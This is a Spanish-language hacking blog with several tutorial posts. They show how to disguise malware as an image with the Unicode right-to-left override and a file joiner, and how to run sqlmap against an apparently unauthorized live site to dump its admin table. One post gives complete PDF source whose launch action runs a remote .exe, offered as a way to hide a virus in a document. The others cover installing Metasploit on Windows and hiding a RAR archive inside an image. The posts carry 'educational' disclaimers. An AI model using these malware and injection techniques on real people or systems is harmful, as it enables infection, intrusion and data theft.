:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta Windows. Mostrar todas las entradas

jueves, 4 de agosto de 2016

Aquí está el tutorial de cómo ocultar un virus o malware dentro de una imagen.




Link del Unicode Input: http://shink.in/TYR91

Link del Resourse Hacker: http://shink.in/SbYLF

Link del Joiner: http://www.connect-trojan.net/2014/04/advanced-file-joiner-v10.html (Pueden utilizar otro Joiner quizá mas actualizado, en el video utilizé este)

En este vídeo se muestra uno de los procesos que se pueden llevar a cabo para poder crear un archivo que parezca una imagen en casi todos sus aspectos, pero que contiene un Malware dentro, en este método se usa el Left to Right Override de Unicode.


IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia a menos que se indique lo contrario.
-Cuculmeca

martes, 2 de agosto de 2016

En este vídeo mostraré solamente que esto "se puede hacer".

A mas tardar el día Miércoles 3 de Agosto se subirá en un nuevo Post uno de los métodos por los cuales es posible realizar esta operación.

Imagen de: http://www.movilzona.es/

Aunque se tiene que aclarar que  lo que se hace es crear un ejecutable que lanza un Malware y la imagen a la vez, pero que tiene pinta de no ser un ejecutable, sino de una imagen cualquiera.

Es algo divertido, y algo ingenioso, la verdad creería que hay varios métodos, aquí compartiré uno de ellos, aunque como deje al principio del post, este será solamente un vídeo de demostración.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia a menos que se indique lo contrario.
-Cuculmeca

viernes, 22 de julio de 2016

Este tutorial está hecho por @TheSkatch, pueden buscarlo en Twitter.


¿Qué es una inyección SQL?


Es una técnica de Inyección o Inserción SQL por código usada para atacar sistemas de base de datos, estas inyecciones se hacen por medio de los datos de entrada desde la parte del cliente hacia la aplicación. Este código se inyecta y el atacante puede modificar las peticiones reales que debe ejecutar una aplicación y las sustituye por otras, esto con el fin de acceder a dichas bases de datos, robar información de las tablas, o incluso eliminarlas.

Para mas información puedes visitar Wikipedia: 

https://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL


http://www.supra.com.pe/


Antes de realizar cualquier procedimiento en este blog te invito vallas al final de cada post, y leas todo lo importante, para que así no hayan malos entendidos y se pueda comprender mejor la intención de estos post.

PROCEDIMIENTO:

1. Para empezar vamos a descargar  lo que vamos a necesitar en este caso será el SQLMAP y PYTHON desde sus páginas oficiales.






2. El sqlmap se descargara en un archivo .zip por lo tanto tendremos que descomprimir y python se instalara como cualquier otro programa.
(Python es un lenguaje de programación , pero hara funcionar sqlmap en nuestra línea de comandos cmd)

3. Ya que descomprimimos el archivo .zip de SQLMAP vamos a mover la carpeta al DISCO LOCAL (C:)  


4. Instalan normalmente el PYTHON y cuando termine la instalación, ahora si seguimos con buscar una página vulnerable a SQL INJECTION.

5. Esta será mi página vulnerable a la que intentare entrar, como se si es vulnerable? Solo pon una ‘  al final del link 


6. Como pueden ver me da un error en my SQL syntax entonces es vulnerable.


7. Ahora vamos al símbolo de sistema (cmd) y vamos a abrir la carpeta de SQLMAP desde ahí de la siguiente manera

8. Primero nos vamos a salir de donde nos manda por defecto en mi caso (C: users DIJITAL>) para esto vamos a poner el comando “cd .. ”hasta llegar al DISCO LOCAL C: 


9. Ya que llegamos al disco local, ahora vamos a entrar a SQLMAP para esto vamos a poner “ cd sqlmap “ 
En este paso ya estamos dentro de la carpeta de SQLMAP que descargamos anteriormente.


10. Ahora vamos a entrar a la página vulnerable que encontramos, vamos a copiar la url y vamos a poner el siguiente comando.

“ sqlmap.py -u (Aquí va  la url de la página)  --dbs “



(Recuerden que la url que va aquí es la original no la que le pusieron la apostrofe o comilla simple.)

11. Dan “ENTER” y esperan a que haga el proceso



Como pueden ver ahí me esta dando las bases de datos de la pagina, en este punto van a elegir la base de datos a la que quieran entrar (menos information_schema) en este caso yo voy a entrar en “KEYWORDS”.


12.  Para entrar en esa base de datos vamos a poner el siguiente comando:

“  sqlmap.py -u (url de la pagina)  -D keywords --tables “


 
13. Como pueden ver me dio las tablas de esa base de datos, aquí se pueden hacer dos cosas:



1) Sacar los datos de todas las tablas al mismo tiempo.
2) sacar los datos de una por una.

14. Yo sacare de una por una  con el siguiente comando 


“  sqlmap.py -u (url de la pagina) -D keywords -T admin --dump “

Todos los dumps que haga se iran a una carpeta, después de cada dump les dira en donde se esta guardando  en mi caso esta en (C:\Users\DIJITAL\.sqlmap) va a ser una carpeta oculta. 



Entran a la carpeta con el nombre de la página a la que entraron y estará una que dice dump, entran ahí.



Ahí les saldrá a lo que le hicieron dump

Entran y estarán unos archivos de exel con toda la información de las tablas que sacaron en cmd.




Los abren y estará todo :v



Nota: Aquí solo les saldrá lo que hayan dumpeado, no saldrá todo lo de la página si no lo abrieron anteriormente.

Por ejemplo: yo solo abrí una base de datos por lo tanto no saldrá lo que hay en las otras hasta que entre en ellas y haga el dump

Luego que tengan esos datos tendrán que ir donde el administrador del sistema que hayan realizado la Inyección y notificarle que está en peligro y que debe mejorar su seguridad, sin tocar absolutamente nada ni modificar sus datos, hay que ser éticos.


SHAVOTS PUES ES TODO ESPERO QUE LES SIRVA Y SE DIVIERTAN xD
Alguna duda infórmenme :v los jamon con queso <3


IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.

* Las imágenes han sido de elaboración propia a menos que se indique lo contrario.

* Se han sensurado datos que pueden ser demasiado sensibles, esto es para respetar la privacidad de mi o de otra persona/firma/web involucrada en la prueba.

- Cuculmeca

@TheSkatch

domingo, 3 de julio de 2016

Muy buenas, aquí les mostraré brevemente cómo ocultar un virus dentro de un documento "Amigable".

Estos métodos son usados por algunas personas maliciosas para tener el control de un usuario desde cualquier parte, robar su información, descargarle sus archivos, crearle otros, luego extorsionarlo entre otras actividades delictivas.

Normalmente estos PDF viene camuflados como "Guías de Hacking" o cosas demasiado buenas para ser verdad (OJO que no todas estas guías traerán virus claro está).

Este tutorial en realidad será muy sencillo, copiar y pegar un código, y editarle ciertas cosas.

Primero antes que nada creamos un archivo .txt en cualquier parte de nuestro equipo y le ubicaremos el siguiente código:



%PDF-1.1
1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj
2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj
3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj
4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Aquí se deberá poner todo el texto que llevará el PDF)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.host/nombre.exe)
 >>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

lunes, 27 de junio de 2016

Es normal al hablar de Metasploit, encontrarnos con que este se trabaja usualmente en distribuciones dedicadas mas que nada al Pentesting o Hacking Ético.


Sin embargo es posible instalar Metasploit Framework para trabajarlo en Windows (Incluso en Smartphones android por ejemplo), ya que es multiplataforma. En este post de indicará de manera sencilla cómo instalar Metasploit Framework en Windows para los que no desean tener una distribución de pentesting o que simplemente quieren aprender a instalarlo en el sistema Operativo mas usado por usuarios de casa.

Primero necesitaremos:

* Metasploit Framework para Windows, este se puede descargar normalmente en este Link http://windows.metasploit.com/metasploitframework-latest.msi.
* Una PC con Windows.
* Una imagen .ico de metasploit, esta se puede descargar de Aquí.

Procedimiento:

Cuando descarguemos el Metasploit vamos a abrirlo y aparecerá lo siguiente:


Vamos a aceptar los términos y le damos en Siguiente:


Le damos en siguiente y luego en Instalar, vamos a esperar un momento.


Ahora que termine de instalar vamos a la carpeta de Instalación del Metasploit, si no la cambiaste estará en C:/metasploit/, aquí vamos a crear un acceso directo del archivo dev_msfconsole.dat o en su defecto msfconsole.bat (Me encargué de llevar el acceso directo a una carpeta), vamos a Propiedades del acceso directo y le cambiaremos el icono (Si aparece una ventana de que el archivo no tiene icono, solamente denle aceptar)



Aquí buscaremos el ícono que descargamos en la parte de arriba, y se lo vamos a asignar, de esta manera, aceptamos los cambios y tendremos completado la Instalación correcta del Metasploit en Windows.



TERMINADO!!!!
Ahora ya se pueden utilizar las herramientas que nos proporciona Metasploit en Windows.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

* No me hago responsable de los daños que le puedan dar a su PC el uso de estas herramientas, todo esta bajo su responsabilidad.

* Es recomendable tener todas estas herramientas en una VM.








miércoles, 22 de junio de 2016

Hola a todos, vengo a mostrar algo que es bastante común, por naturaleza hay información que queremos ocultar, o queremos que pase de forma desapercibida por algún lugar, muchas veces nos preguntamos. ¿Cómo hacer para ocultar una información en una imagen cualquiera sin ningún programa?. 

Imagen de www.adslzone.net
No te confundas, la imagen dice Windows 10, pero se puede usar cualquier sistema operativo rufian. En este post se mostrará como responder a esa pregunta, vamos a crear un archivo que lo comprimiremos con WinRar, y lo anexaremos a una imagen que tengamos en nuestra PC, todo esto con una herramienta que el mismo Windows trae consigo.

Requisitos: 

- Una Imagen cualquiera (En la que queremos meter la información). 
- Los archivos, o la información que queremos ocultar en la Imagen.  

Procedimiento:

Primero vamos a ver que en una carpeta cualquiera tengamos los archivos necesarios.


El archivo que ocultaré va a ser un simple txt, osea un archivo de bloc de notas.
En este archivo he escrito por ejemplo "Hola a todos".
Obviamente yo solo lo hago con algo sencillo, pero ustedes pueden ocultar cualquier archivo que deseen.


Bien, cuando tengamos todos los archivos que deseamos ocultar, vamos a moverlos al WinRar que habiamos creado (Este WinRar se crea dando click derecho en cualquier parte de la carpeta y dando en Nuevo → Archivo WinRar)

Igualmente si no quieren crear el archivo WinRar de primero, simplemente pueden crear un archivo rar seleccionando todos los archivos que desean ocultar y dando click derecho → Añadir al archivo nombre.rar.

Aquí la imagen de ejemplo.


Ahora ya vamos a ir al símbolo de sistema.

En Windows 8/10: Das click derecho al ícono de Windows (Abajo a la izquierda), luego a "Símbolo de Sistema.

En Windows XP/7: Presionas las Teclas Windows+R, aparecerá una ventana de ejecutar, ahí se debe escribir "cmd", y darle en Aceptar.

Ya abierto, aparecerá una consola normalmente de fondo negro (A menos que se cambie).
Vamos a escribir los siguientes comandos.

cd ..
cd ..

Una imagen para mayor referencia.



Aquí deberemos pegar la ruta de la carpeta en la que están los archivos que vamos a fusionar, para ello debemos ir a la parte de arriba de la carpeta y copiar la dirección de la misma. (En realidad se puede acceder manualmente, pero se hará así ya que es mas rápido)


Lo copiamos y lo pegaremos en el cmd de la siguiete forma (En mi ejemplo).

cd C:\Users\AMD A10\Desktop\Vídeos de YouTube\[Windows] Cómo esconder información y archivos en una imagen

Se puede ver que primero estará siempre escrito cd, y luego lo que copiamos.
NOTA: Para pegar algo en el CMD no se hace con las teclas rápidas de Crtl+V, sino que se deberá hacer con Click Derecho y Pegar.

Entonces ya habremos accedido a nuestra carpeta en el cmd de Windows.


Ahora lo que debemos hacer es ubicar en el mismo cmd.

copy /b nombredelarchivo.rar + imagen.png/jpg Resultado.png/jpg

Aquí lo que hacemos es usando el comando Copiar ubicamos primero el archivo rar donde esta toda la información (A este recomiendo darle un nombre que no tenga espacios), luego viene un signo " + ", se anexa la imagen en la que esconderemos la información, y al final con un espacio se escribe el nombre de la imagen que llevará (Imagen + Información).

En mi caso he puesto lo siguiente:

copy /b Oculto.rar + Imagen.png Resultado.png

Windows nos dirá que ya está todo hecho.


Verás que se ha creado una nueva imagen, idéntica a la anterior, pero con un peso un poco mayor.

Esta imagen se abrirá normalmente como una imagen cualquiera, pero solamente tú sabrás que esa nueva imagen tiene información.

Aquí vemos la comparación de las dos imagenes: Imagen Real vs Imagen con Información.


Para acceder a la información que le hemos puesto a nuestra nueva imagen, deberemos abrirla con WinRar como muestra en la imagen.


Si se intentará abrir de otra manera, entonces solamente mostrará la imagen, sin información y sin sospechas.
Aquí se puede ver que se abre un archivo rar al momento de que usamos WinRar para abrir la imagen, y luego corroborar que el archivo dentro es el bloc de notas que habíamos creado.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

A call-to-action text Contact us